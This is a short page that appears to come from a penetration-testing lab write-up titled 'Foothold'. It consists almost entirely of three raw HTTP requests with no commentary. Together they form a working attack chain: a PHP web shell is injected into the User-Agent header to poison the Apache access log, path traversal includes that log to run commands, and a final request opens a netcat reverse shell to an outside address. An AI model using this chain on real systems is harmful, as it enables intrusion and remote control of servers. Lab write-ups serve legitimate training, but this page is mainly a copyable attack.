Foothold

GET / HTTP/1.1
Host: 192.168.192.72
User-Agent: <?php echo system($_GET['cmd']); ?> 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=ngpmpkgvn8jvp9os8ieecj3j7i
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 25 Jun 2020 14:45:19 GMT
If-None-Match: "128-5a8e9a431c517-gzip"

GET /index.php?book=../../../../../../../var/log/apache2/access.log&cmd=whoami HTTP/1.1
Host: 192.168.192.72:8593
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=ngpmpkgvn8jvp9os8ieecj3j7i
Upgrade-Insecure-Requests: 1

GET /index.php?book=../../../../../../../var/log/apache2/access.log&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+192.168.45.216+1337+>/tmp/f HTTP/1.1
Host: 192.168.192.72:8593
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=ngpmpkgvn8jvp9os8ieecj3j7i
Upgrade-Insecure-Requests: 1

Previous62524 NextEnumeration

Last updated 8 months ago